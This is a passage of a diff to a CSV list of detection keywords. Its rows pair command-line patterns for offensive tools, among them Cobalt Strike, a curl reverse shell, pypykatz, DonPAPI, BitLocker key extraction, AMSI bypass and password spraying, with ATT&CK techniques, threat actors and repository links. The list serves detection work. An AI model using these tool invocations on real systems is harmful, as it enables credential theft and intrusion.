T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.news.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
-"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*.pdf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pdf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pdf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -2412,8 +2412,8 @@ "*.pptx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.pptx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.ps1 -Base *OU=*DC=* -Credentials * -Server *","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*.py -k * -f *.bat -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.docx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" 
@@ -2429,21 +2429,21 @@ "*.py -k * -f *.xlsm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py rekall *.dmp* -t 0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*.py * 
amsi -disable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*.py * amsi -enable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*.py * --brop *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" -"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential 
Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*.py * -debug -dnstcp*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*.py * --teamserver *","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py *.cs cs ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into 
memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*.py *.exe *NormalDLL.dll*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" -"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*.py 127.0.0.1 50050 logtracker password*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*.py --client ftp --username * --password * --ip * --datatype ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py --client https --data-size * --ip * --datatype cc*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" 
@@ -2456,12 +2456,12 @@ "*.py discover -H domain_list.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py enum -H * -U *.txt -P *.txt -*.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -f *.exe -e -m 4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py -k * 
-f *.doc -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py lock -H * -u administrator -d *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM 
authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py spray -ep *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*.py* --payload *.ps1*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" 
@@ -2483,12 +2483,12 @@ "*.sh *--checksec*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*.sh *cvelist-file:*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*.sharpgen *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - 
